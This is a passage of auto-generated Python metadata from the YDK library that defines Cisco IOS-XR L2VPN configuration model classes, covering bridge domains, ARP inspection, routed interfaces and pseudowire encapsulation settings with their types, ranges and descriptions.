'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
False,
[
_MetaInfoClassMember('dai-address-validation', REFERENCE_CLASS, 'DaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
[], [],
''' Address Validation
''',
'dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Dynamic ARP Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Routed Interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
False,
[
_MetaInfoClassMember('routed-interface', REFERENCE_LIST, 'RoutedInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
[], [],
''' Bridge Domain Routed Interface
''',
'routed_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Name of the bridge domain
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-attachment-circuits', REFERENCE_CLASS, 'BdAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
[], [],
''' Attachment Circuit table
''',
'bd_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowire-evpns', REFERENCE_CLASS, 'BdPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
[], [],
''' List of EVPN pseudowires
''',
'bd_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowires', REFERENCE_CLASS, 'BdPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
[], [],
''' List of pseudowires
''',
'bd_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-storm-controls', REFERENCE_CLASS, 'BdStormControls' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
[], [],
''' Storm Control
''',
'bd_storm_controls',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-evis', REFERENCE_CLASS, 'BridgeDomainEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
[], [],
''' Bridge Domain EVI Table
''',
'bridge_domain_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mac', REFERENCE_CLASS, 'BridgeDomainMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
[], [],
''' MAC configuration commands
''',
'bridge_domain_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mtu', ATTRIBUTE, 'int' , None, None,
[('46', '65535')], [],
''' Maximum transmission unit for this Bridge
Domain
''',
'bridge_domain_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-pbb', REFERENCE_CLASS, 'BridgeDomainPbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
[], [],
''' Bridge Domain PBB
''',
'bridge_domain_pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('coupled-mode', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Coupled-mode configuration
''',
'coupled_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dai', REFERENCE_CLASS, 'Dai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
[], [],
''' Dynamic ARP Inspection
''',
'dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dhcp', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' DHCPv4 Snooping profile name
''',
'dhcp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable flooding
''',
'flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding-unknown-unicast', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Unknown Unicast flooding
''',
'flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach IGMP Snooping Profile Name
''',
'igmp_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable IGMP Snooping
''',
'igmp_snooping_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ip-source-guard', REFERENCE_CLASS, 'IpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
[], [],
''' IP Source Guard
''',
'ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('member-vnis', REFERENCE_CLASS, 'MemberVnis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
[], [],
''' Bridge Domain VxLAN Network Identifier
Table
''',
'member_vnis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mld-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach MLD Snooping Profile Name
''',
'mld_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nv-satellite', REFERENCE_CLASS, 'NvSatellite' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
[], [],
''' nV Satellite
''',
'nv_satellite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('routed-interfaces', REFERENCE_CLASS, 'RoutedInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
[], [],
''' Bridge Domain Routed Interface Table
''',
'routed_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown the Bridge Domain
''',
'shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'BridgeDomainTransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BridgeDomainTransportModeEnum',
[], [],
''' Bridge Domain Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfis', REFERENCE_CLASS, 'Vfis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
[], [],
''' Specify the virtual forwarding interface
name
''',
'vfis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
False,
[
_MetaInfoClassMember('bridge-domain', REFERENCE_LIST, 'BridgeDomain' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
[], [],
''' bridge domain
''',
'bridge_domain',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domains',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Bridge group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domains', REFERENCE_CLASS, 'BridgeDomains' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
[], [],
''' List of Bridge Domain
''',
'bridge_domains',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups',
False,
[
_MetaInfoClassMember('bridge-domain-group', REFERENCE_LIST, 'BridgeDomainGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
[], [],
''' Bridge group
''',
'bridge_domain_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'L2Tpv3SequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Tpv3SequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
False,
[
_MetaInfoClassMember('type-of-service-mode', REFERENCE_ENUM_CLASS, 'TypeOfServiceModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TypeOfServiceModeEnum',
[], [],
''' Type of service mode
''',
'type_of_service_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service-value', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Type of service value
''',
'type_of_service_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'type-of-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
False,
[
_MetaInfoClassMember('l2tpv3-class-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the L2TPv3 class name
''',
'l2tpv3_class_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('protocol', REFERENCE_ENUM_CLASS, 'L2TpSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpSignalingProtocolEnum',
[], [],
''' L2TPv3 signaling protocol
''',
'protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable path MTU
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('max-path-mtu', ATTRIBUTE, 'int' , None, None,
[('68', '65535')], [],
''' Maximum path maximum transmission unit
''',
'max_path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'path-mtu',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
False,
[
_MetaInfoClassMember('cookie-size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Cookie size
''',
'cookie_size',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('df-bit-set', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set the do not fragment bit to 1
''',
'df_bit_set',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2TPv3 encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('path-mtu', REFERENCE_CLASS, 'PathMtu' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
[], [],
''' Path maximum transmission unit
''',
'path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_CLASS, 'SignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
[], [],
''' L2TPv3 signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('time-to-live', ATTRIBUTE, 'int' , None, None,
[('1', '255')], [],
''' Time to live
''',
'time_to_live',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service', REFERENCE_CLASS, 'TypeOfService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
[], [],
''' Type of service
''',
'type_of_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tpv3-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
False,
[
_MetaInfoClassMember('disable-backup', ATTRIBUTE, 'int' , None, None,
[('0', '180')], [],
''' Disable backup delay
''',
'disable_backup',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BackupDisableEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BackupDisableEnum',
[], [],
''' Delay or Never
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-disable-delay',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'MplsSequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
False,
[
_MetaInfoClassMember('redundancy-initial-delay', ATTRIBUTE, 'int' , None, None,
[('0', '120')], [],
''' Initial delay before activating the
redundant PW, in seconds
''',
'redundancy_initial_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy-one-way', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force one-way PW redundancy behavior in
Redundancy Group
''',
'redundancy_one_way',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
False,
[
_MetaInfoClassMember('fallback-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Fallback disable
''',
'fallback_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-tunnel-number', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Interface Tunnel number for preferred path
''',
'interface_tunnel_number',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'PreferredPathEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PreferredPathEnum',
[], [],
''' Preferred Path Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'preferred-path',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
False,
[
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance-code', REFERENCE_ENUM_CLASS, 'FlowLabelTlvCodeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelTlvCodeEnum',
[], [],
''' Enable Legacy Flow Label TLV code
''',
'flow_label_load_balance_code',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-label-load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable PW Label based Load Balancing
''',
'pw_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'load-balance-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
False,
[
_MetaInfoClassMember('control-word', REFERENCE_ENUM_CLASS, 'ControlWordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ControlWordEnum',
[], [],
''' Enable control word
''',
'control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MPLS encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance-group', REFERENCE_CLASS, 'LoadBalanceGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
[], [],
''' Load Balancing
''',
'load_balance_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-redundancy', REFERENCE_CLASS, 'MplsRedundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
[], [],
''' Redundancy options for MPLS encapsulation
''',
'mpls_redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('preferred-path', REFERENCE_CLASS, 'PreferredPath' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
[], [],
''' Preferred path
''',
'preferred_path',
'Cisco-IOS-XR-l2vpn-cfg', False),
